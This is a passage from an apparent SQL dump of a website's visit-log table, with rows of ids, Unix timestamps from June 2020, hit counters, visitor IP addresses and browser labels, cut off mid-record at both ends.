102','chrome'),(518334,1593491392,1,1,0,0,'66.249.70.72','chrome'),(518335,1593491479,3,3,0,0,'66.249.70.69','chrome'),(518336,1593491533,2,2,0,0,'66.249.70.70','chrome'),(518337,1593491745,2,2,0,0,'207.38.86.214','chrome'),(518338,1593492219,1,1,0,0,'157.55.39.221','other'),(518339,1593492385,1,1,0,0,'178.154.200.222','other'),(518340,1593492626,1,1,0,0,'62.205.134.182','other'),(518341,1593493107,1,1,0,0,'66.249.70.70','chrome'),(518342,1593493522,2,2,0,0,'91.134.248.245','chrome'),(518343,1593493768,1,1,0,0,'66.249.70.72','chrome'),(518344,1593493774,2,2,0,0,'66.249.64.38','chrome'),(518345,1593493813,4,4,0,0,'66.249.70.69','chrome'),(518346,1593493959,3,3,0,0,'178.154.200.222','other'),(518347,1593494244,1,1,0,0,'66.249.64.36','chrome'),(518348,1593494330,2,2,0,0,'8.29.198.26','other'),(518349,1593494656,2,2,0,0,'66.249.70.70','chrome'),(518350,1593495170,1,1,0,0,'207.46.13.12','other'),(518351,1593496158,1,1,0,0,'157.55.39.64','other'),(518352,1593496175,1,1,0,0,'66.249.64.33','chrome'),(518353,1593496189,3,3,0,0,'66.249.70.70','chrome'),(518354,1593496427,8,8,0,0,'185.11.82.228','other'),(518355,1593497032,2,2,0,0,'102.130.112.235','chrome'),(518356,1593497236,1,1,0,0,'66.249.70.70','chrome'),(518357,1593497357,1,1,0,0,'66.249.64.33','chrome'),(518358,1593497633,1,1,0,0,'207.46.13.166','other'),(518359,1593498458,1,1,0,0,'213.180.203.90','other'),(518360,1593498517,1,1,0,0,'91.196.178.168','chrome'),(518361,1593498746,3,3,0,0,'66.249.70.69','chrome'),(518362,1593498803,1,1,0,0,'66.249.70.72','chrome'),(518363,1593498807,3,3,0,0,'66.249.70.70','chrome'),(518364,1593498839,1,1,0,0,'66.249.64.36','chrome'),(518365,1593499866,2,2,0,0,'66.249.70.70','chrome'),(518366,1593500091,2,2,0,0,'66.249.70.72','chrome'),(518367,1593500101,2,2,0,0,'66.249.70.69','chrome'),(518368,1593500103,1,1,0,0,'91.196.178.181','chrome'),(518369,1593500139,1,1,0,0,'77.120.224.194','chrome'),(518370,1593500176,1,1,0,0,'77.111.244.55','chrome'),(518371,1593500427,1,1,0,0,'213.180.203.33','other'),(518372,1593500429,1,1,0,0,'213.180.203.29','other'),(518373,1593500525,1,1,0,0,'178.154.200.196','other'),(518374,1593500801,1,1,0,0,'66.249.64.33','chrome'),(518375,1593500841,1,1,0,0,'66.249.64.38','chrome'),(518376,1593500871,1,1,0,0,'213.180.203.16','other'),(518377,1593500890,1,1,0,0,'94.153.26.228','chrome'),(518378,1593501643,1,1,0,0,'77.111.244.55','chrome'),(518379,1593501868,3,2,1,0,'66.249.70.70',''),(518380,1593502140,3,3,0,0,'66.249.70.69','chrome'),(518381,1593502319,1,1,0,0,'66.249.70.72','chrome'),(518382,1593502349,1,1,0,0,'146.247.25.80','chrome'),(518383,1593502641,1,1,0,0,'213.180.203.17','other'),(518384,1593502768,1,1,0,0,'66.249.70.70','chrome'),(518385,1593503129,5,5,0,0,'162.223.88.76','chrome'),(518386,1593503181,1,1,0,0,'131.220.6.152','chrome'),(518387,1593503258,1,1,0,0,'51.68.11.215','chrome'),(518388,1593503534,2,2,0,0,'66.249.64.38','chrome'),(518389,1593503794,3,3,0,0,'66.249.70.69','chrome'),(518390,1593503825,1,1,0,0,'66.249.70.72','chrome'),(518391,1593503974,1,1,0,0,'178.154.200.22','other'),(518392,1593504028,1,1,0,0,'66.249.64.33','chrome'),(518393,1593504482,2,2,0,0,'66.249.70.70','chrome'),(518394,1593504598,1,1,0,0,'178.154.200.155','other'),(518395,1593505059,1,0,1,0,'66.249.70.72',''),(518396,1593505151,1,1,0,0,'178.154.200.196','other'),(518397,1593505152,1,1,0,0,'207.46.13.12','other'),(518398,1593505155,1,1,0,0,'8.29.198.27','other'),(518399,1593505158,2,2,0,0,'66.249.70.69','chrome'),(518400,1593505328,1,1,0,0,'8.29.198.26','other'),(518401,1593505645,1,1,0,0,'66.249.64.38','chrome'),(518402,1593505738,2,2,0,0,'207.46.13.166','other'),(518403,1593505769,1,1,0,0,'91.196.177.147','chrome'),(518404,1593505793,1,1,0,0,'66.249.70.72','chrome'),(518405,1593505823,1,1,0,0,'17.58.99.7','other'),(518406,1593505827,1,1,0,0,'88.155.33.98','other'),(518407,1593506071,1,1,0,0,'66.249.64.36','chrome'),(518408,1593506194,1,1,0,0,'66.249.70.70','chrome'),(518409,1593506433,2,2,0,0,'129.226.163.96','chrome'),(518410,1593506638,2,2,0,0,'213.180.203.16','other'),(518411,1593506667,8,8,0,0,'185.11.82.228','other'),(518412,1593506698,1,1,0,0,'178.154.200.220','other'),(518413,1593507521,2,2,0,0,'66.249.70.69','chrome'),(518414,1593507592,1,1,0,0,'59.153.145.116','chrome'),(518415,1593507802,1,1,0,0,'89.46.105.246','chrome'),(518416,1593508164,2,2,0,0,'87.236.20.52','chrome'),(518417,1593508368,1,1,0,0,'66.249.64.36','chrome'),(518418,1593508472,2,2,0,0,'66.249.70.70','chrome'),(518419,1593508498,1,1,0,0,'17.58.99.7','other'),(518420,1593508870,1,1,0,0,'178.154.200.222','other'),(518421,1593508913,2,2,0,0,'66.249.70.69','chrome'),(518422,1593508984,2,2,0,0,'66.249.70.72','chrome'),(518423,1593509169,1,1,0,0,'207.46.13.12','other'),(518424,1593509208,1,1,0,0,'178.154.200.220','other'),(518425,1593509422,2,2,0,0,'66.249.64.36','chrome'),(518426,1593509533,1,1,0,0,'66.249.70.70','chrome'),(518427,1593509823,1,1,0,0,'66.249.70.69','chrome'),(518428,1593509872,1,1,0,0,'3.22.166.7','chrome'),(518429,1593509971,1,1,0,0,'66.249.70.72','chrome'),(518430,1593510170,1,1,0,0,'209.17.96.58','other'),(518431,1593510352,1,1,0,0,'178.154.200.19','other'),(518432,1593510567,1,1,0,0,'194.61.24.94','other'),(518433,1593510675,1,1,0,0,'77.111.244.33','chrome'),(518434,1593510994,1,1,0,0,'212.90.190.6','chrome'),(518435,1593511083,1,1,0,0,'17.58.99.7','other'),(518436,1593511113,2,2,0,0,'66.249.70.69','chrome'),(518437,1593511422,1,1,0,0,'66.249.64.36','chrome'),(518438,1593511477,3,3,0,0,'66.249.70.72','chrome'),(518439,1593511483,1,1,0,0,'66.249.70.70','chrome'),(518440,1593511654,1,1,0,0,'66.249.64.38','chrome'),(518441,1593512075,1,1,0,0,'213.180.203.140','other'),(518442,1593512576,3,3,0,0,'66.249.70.70','chrome'),(518443,1593512579,1,1,0,0,'178.154.200.119','other'),(518444,1593512606,1,1,0,0,'66.249.70.72','chrome'),(518445,1593512799,2,2,0,0,'62.210.185.4','chrome'),(518446,1593512814,1,1,0,0,'195.128.17.206','other'),(518447,1593512891,1,1,0,0,'178.154.200.196','other'),(518448,1593513081,1,1,0,0,'66.249.64.38','chrome'),(518449,1593513385,1,1,0,0,'91.196.178.171','chrome'),(518450,1593513650,2,2,0,0,'178.154.200.222','other'),(518451,1593513864,1,1,0,0,'109.74.154.72','chrome'),(518452,1593513963,1,1,0,0,'37.73.110.118','chrome'),(518453,1593514207,1,1,0,0,'77.68.27.53','chrome'),(518454,1593514614,2,2,0,0,'66.249.70.72','chrome'),(518455,1593514859,1,1,0,0,'66.249.70.70','chrome'),(518456,1593514919,1,1,0,0,'178.154.200.196','other'),(518457,1593514945,1,1,0,0,'66.249.70.69','chrome'),(518458,1593515506,1,1,0,0,'213.180.203.142','other'),(518459,1593515588,1,1,0,0,'91.196.178.161','chrome'),(518460,1593515620,1,1,0,0,'91.196.178.154','chrome'),(518461,1593515644,2,2,0,0,'66.249.64.33','chrome'),(518462,1593515780,5,5,0,0,'207.46.13.86','other'),(518463,1593515984,2,2,0,0,'8.29.198.27','other'),(518464,1593516723,2,2,0,0,'66.249.70.69','chrome'),(518465,1593516969,2,2,0,0,'66.249.70.70','chrome'),(518466,1593517044,1,1,0,0,'66.249.64.36','chrome'),(518467,1593517124,1,1,0,0,'66.249.70.72','chrome'),(518468,1593517206,2,2,0,0,'149.210.146.253','chrome'),(518469,1593517350,1,1,0,0,'91.196.179.33','chrome'),(518470,1593517953,2,2,0,0,'157.55.39.64','other'),(518471,1593517957,2,2,0,0,'66.249.70.69','chrome'),(518472,1593518383,1,1,0,0,'66.249.64.33','chrome'),(518473,1593518618,1,1,0,0,'66.249.70.72','chrome'),(518474,1593518674,1,1,0,0,'91.124.112.134','chrome'),(518475,1593518811,1,1,0,0,'91.196.178.169','chrome'),(518476,1593519132,2,2,0,0,'82.146.50.47','chrome'),(518477,1593519608,8,8,0,0,'185.11.82.228','other'),(518478,1593520234,1,1,0,0,'66.249.70.72','chrome'),(518479,1593520364,3,3,0,0,'66.249.70.70','chrome'),(518480,1593520722,1,1,0,0,'34.239.168.177','other'),(518481,1593521009,1,1,0,0,'213.180.203.81','other'),(518482,1593521193,1,1,0,0,'213.180.203.16','other'),(518483,1593521224,8,8,0,0,'185.11.82.228','other'),(518484,1593521590,1,1,0,0,'178.154.200.236','other'),(518485,1593521978,1,1,0,0,'157.55.39.221','other'),(518486,1593522178,3,3,0,0,'66.249.70.69','chrome'),(518487,1593522838,8,8,0,0,'185.11.82.228','other'),(518488,1593522928,1,1,0,0,'213.180.203.122','other'),(518489,1593523365,1,1,0,0,'91.196.178.89','chrome'),(518490,1593523398,1,1,0,0,'66.249.64.33','chrome'),(518491,1593523662,1,1,0,0,'89.46.105.252','chrome'),(518492,1593523790,1,1,0,0,'66.249.64.36','chrome'),(518493,1593524042,1,1,0,0,'185.23.106.171','chrome'),(518494,1593524198,1,1,0,0,'66.249.70.69','chrome'),(518495,1593524200,3,3,0,0,'66.249.70.70','chrome'),(518496,1593524555,8,8,0,0,'185.11.82.228','other'),(518497,1593524796,1,1,0,0,'178.154.200.236','other'),(518498,1593525311,1,1,0,0,'66.249.64.36','chrome'),(518499,1593525556,1,1,0,0,'27.254.140.71','chrome'),(518500,1593525794,1,1,0,0,'157.55.39.56','other'),(518501,1593525811,1,1,0,0,'66.249.64.38','chrome'),(518502,1593526089,2,2,0,0,'66.249.70.70','chrome'),(518503,1593526091,1,1,0,0,'93.94.66.0','chrome'),(518504,1593526275,8,8,0,0,'185.11.82.228','other'),(518505,1593526606,1,1,0,0,'213.180.203.16','other'),(518506,1593526807,2,2,0,0,'8.29.198.26','other'),(518507,1593527659,1,1,0,0,'66.249.70.70','chrome'),(518508,1593527850,2,2,0,0,'66.249.64.36','chrome'),(518509,1593528001,8,8,0,0,'185.11.82.228','other'),(518510,1593528467,2,2,0,0,'66.249.64.33','chrome'),(518511,1593528981,1,1,0,0,'213.180.203.16','other'),(518512,1593529200,1,0,1,0,'66.249.64.36',''),(518513,1593529201,3,3,0,0,'66.249.64.36','chrome'),(518514,1593529350,1,1,0,0,'66.249.70.72','chrome'),(518515,1593529394,1,1,0,0,'66.249.70.69','chrome'),(518516,1593529474,1,1,0,0,'66.249.64.38','chrome'),(518517,1593529610,1,1,0,0,'213.180.203.3','other'),(518518,1593529673,8,8,0,0,'185.11.82.228','other'),(518519,1593529687,2,1,1,0,'66.249.70.70',''),(518520,1593530537,1,1,0,0,'66.249.64.36','chrome'),(518521,1593530899,2,2,0,0,'66.249.70.69','chrome'),(518522,1593531045,1,1,0,0,'69.167.175.221','chrome'),(518523,1593531262,1,1,0,0,'89.19.48.184','chrome'),(518524,1593531273,1,1,0,0,'17.58.99.7','other'),(518525,1593531385,8,8,0,0,'185.11.82.228','other'),(518526,1593531730,1,1,0,0,'157.55.39.64','other'),(518527,1593532114,1,1,0,0,'77.74.177.114','chrome'),(518528,1593532115,1,0,1,0,'66.249.70.72',''),(518529,1593532496,2,2,0,0,'66.249.70.70','chrome'),(518530,1593532545,3,3,0,0,'154.81.86.238','chrome'),(518531,1593532738,1,1,0,0,'66.249.64.36','chrome'),(518532,1593533098,8,8,0,0,'185.11.82.228','other'),(518533,1593533385,1,1,0,0,'178.154.200.97','other'),(518534,1593533406,1,1,0,0,'157.55.39.221','other'),(518535,1593533481,1,1,0,0,'178.154.200.196','other'),(518536,1593533497,1,1,0,0,'66.249.70.70','chrome'),(518537,1593533580,1,1,0,0,'213.180.203.35','other'),(518538,1593533771,1,1,0,0,'66.249.70.72','chrome'),(518539,1593533788,1,1,0,0,'213.180.203.37','other'),(518540,1593534374,1,1,0,0,'213.180.203.90','other'),(518541,1593534469,1,1,0,0,'46.219.6.41','chrome'),(518542,1593534824,2,2,0,0,'66.249.70.70','chrome'),(518543,1593534847,8,8,0,0,'185.11.82.228','other'),(518544,1593535150,1,1,0,0,'95.133.150.111','chrome'),(518545,1593535421,1,1,0,0,'89.46.105.169','chrome'),(518546,1593535588,2,2,0,0,'199.116.78.83','chrome'),(518547,1593535787,2,2,0,0,'66.249.70.72','chrome'),(518548,1593535875,1,1,0,0,'37.55.150.120','chrome'),(518549,1593535891,1,1,0,0,'66.249.70.69','chrome'),(518550,1593536473,1,1,0,0,'66.249.64.36','chrome'),(518551,1593536658,8,8,0,0,'185.11.82.228','other'),(518552,1593536846,1,1,0,0,'66.249.70.70','chrome'),(518553,1593536984,1,1,0,0,'66.249.64.38','chrome'),(518554,1593537002,1,1,0,0,'66.249.70.69','chrome'),(518555,1593537628,1,1,0,0,'8.29.198.26','other'),(518556,1593537814,1,1,0,0,'8.29.198.25','other'),(518557,1593538045,1,1,0,0,'157.55.39.64','other'),(518558,1593538144,1,1,0,0,'66.249.64.38','chrome'),(518559,1593538294,8,8,0,0,'185.11.82.228','other'),(518560,1593538783,2,2,0,0,'5.2.91.48','chrome'),(518561,1593540359,8,8,0,0,'185.11.82.228','other'),(518562,1593540470,1,1,0,0,'66.249.64.36','chrome'),(518563,1593540611,2,2,0,0,'157.55.39.221','other'),(518564,1593540690,2,2,0,0,'51.68.11.207','chrome'),(518565,1593540751,1,1,0,0,'157.55.39.56','other'),(518566,1593540822,1,1,0,0,'80.150.6.150','chrome'),(518567,1593541213,1,1,0,0,'178.154.200.97','other'),(518568,1593541593,1,1,0,0,'66.249.70.70','chrome'),(518569,1593541890,1,1,0,0,'37.55.227.171','chrome'),(518570,1593542063,2,2,0,0,'66.249.70.69','chrome'),(518571,1593542097,1,1,0,0,'66.249.64.36','chrome'),(518572,1593542357,1,1,0,0,'37.143.62.57','chrome'),(518573,1593542521,1,1,0,0,'66.249.70.70','chrome'),(518574,1593542671,8,8,0,0,'185.11.82.228','other'),(518575,1593542883,1,1,0,0,'178.154.200.222','other'),(518576,1593543082,3,3,0,0,'66.249.70.69','chrome'),(518577,1593543502,2,2,0,0,'157.55.39.64','other'),(518578,1593544415,1,1,0,0,'157.55.39.64','other'),(518579,1593544475,1,1,0,0,'17.58.99.7','other'),(518580,1593544708,1,1,0,0,'213.180.203.16','other'),(518581,1593545371,2,2,0,0,'47.52.43.140','chrome'),(518582,1593545929,7,7,0,0,'46.101.80.192','chrome'),(518583,1593546072,8,8,0,0,'185.11.82.228','other'),(518584,1593546519,1,1,0,0,'178.154.200.92','other'),(518585,1593546544,1,1,0,0,'213.180.203.16','other'),(518586,1593547391,1,1,0,0,'198.38.82.11','chrome'),(518587,1593547455,1,1,0,0,'157.55.39.56','other'),(518588,1593548464,2,2,0,0,'8.29.198.26','other'),(518589,1593548522,8,8,0,0,'185.11.82.228','other'),(518590,1593548547,1,1,0,0,'37.73.17.136','chrome'),(518591,1593549821,2,2,0,0,'157.55.39.56','other'),(518592,1593549954,8,8,0,0,'185.11.82.228','other'),(518593,1593550493,1,1,0,0,'178.154.200.236','chrome'),(518594,1593550580,1,1,0,0,'178.154.200.222','other'),(518595,1593551357,8,8,0,0,'185.11.82.228','other'),(518596,1593551719,1,1,0,0,'89.46.105.252','chrome'),(518597,1593552366,1,0,1,0,'66.249.70.70',''),(518598,1593552515,1,1,0,0,'66.249.70.70','chrome'),(518599,1593552781,8,8,0,0,'185.11.82.228','other'),(518600,1593553151,1,1,0,0,'178.154.200.220','other'),(518601,1593553314,1,1,0,0,'66.249.70.72','chrome'),(518602,1593553461,1,1,0,0,'66.249.64.38','chrome'),(518603,1593553480,1,1,0,0,'51.68.11.199','chrome'),(518604,1593553506,1,1,0,0,'66.249.64.33','chrome'),(518605,1593553604,1,1,0,0,'178.154.200.155','other'),(518606,1593554208,8,8,0,0,'185.11.82.228','other'),(518607,1593555400,8,8,0,0,'94.130.9.183','other'),(518608,1593555628,8,8,0,0,'185.11.82.228','other'),(518609,1593556237,1,1,0,0,'17.58.99.7','other'),(518610,1593556309,1,1,0,0,'66.249.64.36','chrome'),(518611,1593556320,1,1,0,0,'66.249.70.69','chrome'),(518612,1593556346,7,7,0,0,'94.130.9.183','other'),(518613,1593556393,2,2,0,0,'212.158.174.121','chrome'),(518614,1593556502,2,2,0,0,'95.179.178.247','firefox'),(518615,1593556920,1,1,0,0,'66.249.64.38','chrome'),(518616,1593557046,1,1,0,0,'157.55.39.64','other'),(518617,1593557580,8,8,0,0,'185.11.82.228','other'),(518618,1593557792,1,1,0,0,'66.249.70.70','chrome'),(518619,1593557958,1,1,0,0,'157.55.39.64','other'),(518620,1593558073,1,1,0,0,'178.154.200.220','chrome'),(518621,1593558156,1,1,0,0,'178.154.200.175','other'),(518622,1593558177,1,1,0,0,'66.249.70.69','chrome'),(518623,1593558353,1,1,0,0,'207.46.13.211','other'),(518624,1593559032,1,1,0,0,'5.45.37.32','chrome'),(518625,1593559302,1,1,0,0,'8.29.198.26','other'),(518626,1593559473,1,1,0,0,'8.29.198.27','other'),(518627,1593559584,8,8,0,0,'185.11.82.228','other'),(518628,1593560919,2,2,0,0,'157.55.39.58','other'),(518629,1593561305,1,1,0,0,'62.205.134.182','other'),(518630,1593561590,8,8,0,0,'185.11.82.228','other'),(518631,1593561969,1,1,0,0,'157.55.39.64','other'),(518632,1593562691,2,2,0,0,'157.55.39.58','other'),(518633,1593563279,8,8,0,0,'185.11.82.228','other'),(518634,1593563505,1,1,0,0,'46.21.198.188','chrome'),(518635,1593564207,1,1,0,0,'66.249.64.33','chrome'),(518636,1593564654,2,2,0,0,'207.46.13.211','other'),(518637,1593564728,8,8,0,0,'185.11.82.228','other'),(518638,1593564880,2,2,0,0,'91.208.99.2','chrome'),(518639,1593565514,1,1,0,0,'185.32.188.146','chrome'),(518640,1593565691,3,3,0,0,'66.249.70.70','chrome'),(518641,1593566202,8,8,0,0,'185.11.82.228','other'),(518642,1593566272,1,1,0,0,'95.211.209.246','chrome'),(518643,1593566274,1,1,0,0,'66.249.93.210','chrome'),(518644,1593566277,1,1,0,0,'128.30.52.134','other'),(518645,1593566603,2,2,0,0,'51.68.11.227','chrome'),(518646,1593566840,1,1,0,0,'66.249.70.70','chrome'),(518647,1593567646,8,8,0,0,'185.11.82.228','other'),(518648,1593568148,2,2,0,0,'66.249.70.69','chrome'),(518649,1593568153,2,2,0,0,'66.249.64.33','chrome'),(518650,1593568763,1,1,0,0,'157.55.39.107','other'),(518651,1593569100,8,8,0,0,'185.11.82.228','other'),(518652,1593569182,2,2,0,0,'67.227.152.219','chrome'),(518653,1593569411,3,3,0,0,'207.46.13.211','other'),(518654,1593570056,1,1,0,0,'66.249.64.36','chrome'),(518655,1593570131,1,1,0,0,'8.29.198.26','other'),(518656,1593570296,1,1,0,0,'8.29.198.25','other'),(518657,1593570305,1,1,0,0,'66.249.64.33','chrome'),(518658,1593570542,8,8,0,0,'185.11.82.228','other'),(518659,1593570775,1,1,0,0,'66.249.70.72','chrome'),(518660,1593571737,3,3,0,0,'66.249.70.70','chrome'),(518661,1593571750,1,1,0,0,'66.249.70.69','chrome'),(518662,1593571823,1,0,1,0,'66.249.70.72',''),(518663,1593571999,8,8,0,0,'185.11.82.228','other'),(518664,1593572715,1,1,0,0,'62.149.15.172','chrome'),(518665,1593572847,1,1,0,0,'81.88.49.51','chrome'),(518666,1593572856,1,1,0,0,'81.88.49.18','chrome'),(518667,1593573472,8,8,0,0,'185.11.82.228','other'),(518668,1593574556,1,1,0,0,'157.55.39.64','other'),(518669,1593574908,8,8,0,0,'185.11.82.228','other'),(518670,1593575310,1,1,0,0,'66.249.64.38','chrome'),(518671,1593575361,1,1,0,0,'66.249.64.33','chrome'),(518672,1593575670,1,1,0,0,'66.249.70.70','chrome'),(518673,1593576183,1,1,0,0,'103.18.6.177','chrome'),(518674,1593576378,8,8,0,0,'185.11.82.228','other'),(518675,1593576595,1,1,0,0,'66.249.70.69','chrome'),(518676,1593577905,8,8,0,0,'185.11.82.228','other'),(518677,1593578244,1,1,0,0,'156.67.237.84','chrome'),(518678,1593578470,1,1,0,0,'66.249.70.69','chrome'),(518679,1593578510,1,1,0,0,'131.220.6.152','chrome'),(518680,1593579038,1,1,0,0,'17.58.99.7','other'),(518681,1593579135,1,1,0,0,'66.249.64.33','chrome'),(518682,1593579261,1,1,0,0,'62.205.134.182','other'),(518683,1593579449,8,8,0,0,'185.11.82.228','other'),(518684,1593579598,1,1,0,0,'157.55.39.58','other'),(518685,1593579847,4,4,0,0,'91.208.99.2','chrome'),(518686,1593580304,1,1,0,0,'66.249.64.38','chrome'),(518687,1593580956,1,1,0,0,'8.29.198.25','other'),(518688,1593580972,1,1,0,0,'66.249.64.33','chrome'),(518689,1593581014,8,8,0,0,'185.11.82.228','other'),(518690,1593581115,1,1,0,0,'8.29.198.27','other'),(518691,1593581603,2,2,0,0,'62.210.185.4','chrome'),(518692,1593582207,1,1,0,0,'31.13.127.1','other'),(518693,1593582208,1,1,0,0,'31.13.127.5','other'),(518694,1593582549,8,8,0,0,'185.11.82.228','other'),(518695,1593582625,1,1,0,0,'66.249.70.69','chrome'),(518696,1593583489,1,1,0,0,'37.73.72.212','chrome'),(518697,1593583638,1,1,0,0,'157.55.39.64','other'),(518698,1593584100,8,8,0,0,'185.11.82.228','other'),(518699,1593584381,1,1,0,0,'66.249.70.70','chrome'),(518700,1593584588,1,1,0,0,'37.55.150.120','chrome'),(518701,1593584617,1,1,0,0,'185.15.89.103','chrome'),(518702,1593584730,1,1,0,0,'91.196.178.66','chrome'),(518703,1593585398,1,1,0,0,'91.196.178.82','firefox'),(518704,1593585489,1,1,0,0,'91.196.122.158','chrome'),(518705,1593585613,1,0,1,0,'66.249.70.69',''),(518706,1593585712,8,8,0,0,'185.11.82.228','other'),(518707,1593587034,2,2,0,0,'199.116.78.83','chrome'),(518708,1593587069,1,1,0,0,'66.249.70.72','chrome'),(518709,1593587348,8,8,0,0,'185.11.82.228','other'),(518710,1593588077,1,1,0,0,'91.234.0.145','chrome'),(518711,1593588291,7,7,0,0,'51.68.11.231','chrome'),(518712,1593588500,1,1,0,0,'66.249.64.33','chrome'),(518713,1593588502,1,0,1,0,'66.249.64.36',''),(518714,1593588729,1,1,0,0,'194.61.24.94','other'),(518715,1593589036,8,8,0,0,'185.11.82.228','other'),(518716,1593589389,1,1,0,0,'91.196.178.185','chrome'),(518717,1593589911,1,1,0,0,'192.198.92.114','chrome'),(518718,1593590082,1,1,0,0,'66.249.70.70','chrome'),(518719,1593590624,1,1,0,0,'157.55.39.64','other'),(518720,1593590768,8,8,0,0,'185.11.82.228','other'),(518721,1593591373,5,5,0,0,'34.239.168.177','other'),(518722,1593591392,2,2,0,0,'207.46.13.211','other'),(518723,1593591555,1,1,0,0,'91.196.178.169','chrome'),(518724,1593591670,1,1,0,0,'17.58.99.7','other'),(518725,1593591781,1,1,0,0,'8.29.198.25','other'),(518726,1593591871,1,1,0,0,'66.249.70.69','chrome'),(518727,1593591939,1,1,0,0,'8.29.198.26','other'),(518728,1593592097,2,2,0,0,'66.249.70.72','chrome'),(518729,1593592136,1,1,0,0,'195.88.159.34','chrome'),(518730,1593592425,4,4,0,0,'78.24.179.226','chrome'),(518731,1593592443,8,8,0,0,'185.11.82.228','other'),(518732,1593592604,2,2,0,0,'37.17.224.121','chrome'),(518733,1593592822,1,1,0,0,'95.152.62.173','chrome'),(518734,1593593094,2,2,0,0,'66.249.64.36','chrome'),(518735,1593593284,1,1,0,0,'91.196.178.169','chrome'),(518736,1593593527,2,2,0,0,'17.58.99.7','other'),(518737,1593593633,1,1,0,0,'209.17.97.50','other'),(518738,1593594105,8,8,0,0,'185.11.82.228','other'),(518739,1593594424,2,2,0,0,'198.16.66.197','chrome'),(518740,1593595570,5,5,0,0,'34.239.168.177','other'),(518741,1593595676,2,2,0,0,'104.207.233.143','chrome'),(518742,1593595779,8,8,0,0,'185.11.82.228','other'),(518743,1593595868,1,1,0,0,'91.196.179.33','chrome'),(518744,1593596049,1,1,0,0,'91.196.178.21','chrome'),(518745,1593596399,1,1,0,0,'149.255.62.65','chrome'),(518746,1593596723,1,1,0,0,'157.55.39.64','other'),(518747,1593597006,1,1,0,0,'66.249.64.36','chrome'),(518748,1593597358,8,8,0,0,'185.11.82.228','other'),(518749,1593597361,1,1,0,0,'185.208.164.125','chrome'),(518750,1593597395,2,2,0,0,'45.13.160.146','chrome'),(518751,1593598331,1,1,0,0,'66.249.70.70','chrome'),(518752,1593598786,1,1,0,0,'5.45.37.32','chrome'),(518753,1593599057,2,2,0,0,'66.249.70.69','chrome'),(518754,1593599197,8,8,0,0,'185.11.82.228','other'),(518755,1593599267,1,1,0,0,'18.223.33.201','chrome'),(518756,1593600040,1,1,0,0,'66.249.70.69','chrome'),(518757,1593600690,1,1,0,0,'109.74.154.72','chrome'),(518758,1593600834,8,8,0,0,'185.11.82.228','other'),(518759,1593601948,2,2,0,0,'95.213.141.126','opera'),(518760,1593602061,1,1,0,0,'182.50.151.63','chrome'),(518761,1593602215,1,1,0,0,'163.172.175.50','chrome'),(518762,1593602405,1,1,0,0,'195.128.17.206','other'),(518763,1593602563,8,8,0,0,'185.11.82.228','other'),(518764,1593602607,2,2,0,0,'8.29.198.25','other'),(518765,1593602750,1,1,0,0,'51.77.44.35','chrome'),(518766,1593603893,1,1,0,0,'157.55.39.64','other'),(518767,1593604323,8,8,0,0,'185.11.82.228','other'),(518768,1593604572,1,1,0,0,'17.58.99.7','other'),(518769,1593604881,1,1,0,0,'66.249.70.72','chrome'),(518770,1593604883,1,1,0,0,'66.249.70.69','chrome'),(518771,1593605207,1,1,0,0,'66.249.64.36','chrome'),(518772,1593606107,8,8,0,0,'185.11.82.228','other'),(518773,1593606358,1,1,0,0,'157.55.39.107','other'),(518774,1593606523,2,2,0,0,'66.249.70.72','chrome'),(518775,1593606698,4,4,0,0,'66.249.70.70','chrome'),(518776,1593606800,4,4,0,0,'66.249.70.69','chrome'),(518777,1593606863,1,1,0,0,'207.46.13.211','other'),(518778,1593607661,1,1,0,0,'92.112.62.12','chrome'),(518779,1593608104,8,8,0,0,'185.11.82.228','other'),(518780,1593608363,2,2,0,0,'66.249.70.70','chrome'),(518781,1593608886,2,2,0,0,'62.210.185.4','chrome'),(518782,1593609521,1,1,0,0,'157.55.39.64','other'),(518783,1593609569,1,1,0,0,'157.55.39.107','other'),(518784,1593610263,8,8,0,0,'185.11.82.228','other'),(518785,1593610758,2,2,0,0,'212.26.140.63','other'),(518786,1593610776,1,1,0,0,'212.1.124.210','chrome'),(518787,1593611896,1,1,0,0,'66.249.64.33','chrome'),(518788,1593612131,1,1,0,0,'193.58.104.180','chrome'),(518789,1593612481,8,8,0,0,'185.11.82.228','other'),(518790,1593613087,1,1,0,0,'212.1.124.210','chrome'),(518791,1593613433,1,1,0,0,'8.29.198.25','other'),(518792,1593613591,1,1,0,0,'8.29.198.26','other'),(518793,1593613713,1,1,0,0,'66.249.64.38','chrome'),(518794,1593613747,1,1,0,0,'66.249.70.69','chrome'),(518795,1593614728,8,8,0,0,'185.11.82.228','other'),(518796,1593615478,1,1,0,0,'66.249.70.69','chrome'),(518797,1593615568,1,1,0,0,'66.249.70.72','chrome'),(518798,1593615766,1,1,0,0,'66.249.64.33','chrome'),(518799,1593616333,1,1,0,0,'157.55.39.58','other'),(518800,1593616544,1,1,0,0,'157.55.39.64','other'),(518801,1593616678,2,2,0,0,'66.249.70.69','chrome'),(518802,1593616912,1,1,0,0,'193.106.30.99','firefox'),(518803,1593617051,8,8,0,0,'185.11.82.228','other'),(518804,1593617159,1,1,0,0,'66.249.70.72','chrome'),(518805,1593617272,1,1,0,0,'66.249.70.70','chrome'),(518806,1593618221,1,1,0,0,'103.12.50.215','chrome'),(518807,1593618416,1,1,0,0,'66.249.64.38','chrome'),(518808,1593618489,1,1,0,0,'66.249.70.70','chrome'),(518809,1593618597,1,1,0,0,'37.73.129.32','chrome'),(518810,1593618928,1,1,0,0,'91.196.178.187','chrome'),(518811,1593619078,2,2,0,0,'66.249.70.72','chrome'),(518812,1593619085,1,1,0,0,'17.58.99.7','other'),(518813,1593619257,8,8,0,0,'185.11.82.228','other'),(518814,1593621282,1,1,0,0,'157.55.39.107','other'),(518815,1593621493,8,8,0,0,'185.11.82.228','other'),(518816,1593621988,1,1,0,0,'157.55.39.58','other'),(518817,1593622562,1,1,0,0,'157.55.39.64','other'),(518818,1593623079,1,1,0,0,'207.46.13.211','other'),(518819,1593623184,1,1,0,0,'81.88.49.18','chrome'),(518820,1593623193,1,1,0,0,'81.88.49.51','chrome'),(518821,1593623279,2,2,0,0,'5.2.91.48','chrome'),(518822,1593623879,8,8,0,0,'185.11.82.228','other'),(518823,1593624038,1,1,0,0,'66.249.70.69','chrome'),(518824,1593624066,1,1,0,0,'66.249.70.72','chrome'),(518825,1593624131,1,1,0,0,'207.46.13.211','other'),(518826,1593624273,1,1,0,0,'8.29.198.25','other'),(518827,1593624409,1,1,0,0,'8.29.198.27','other'),(518828,1593624423,1,1,0,0,'94.247.176.153','chrome'),(518829,1593624865,2,2,0,0,'51.68.11.227','chrome'),(518830,1593624870,2,2,0,0,'51.68.11.211','chrome'),(518831,1593626105,2,2,0,0,'66.249.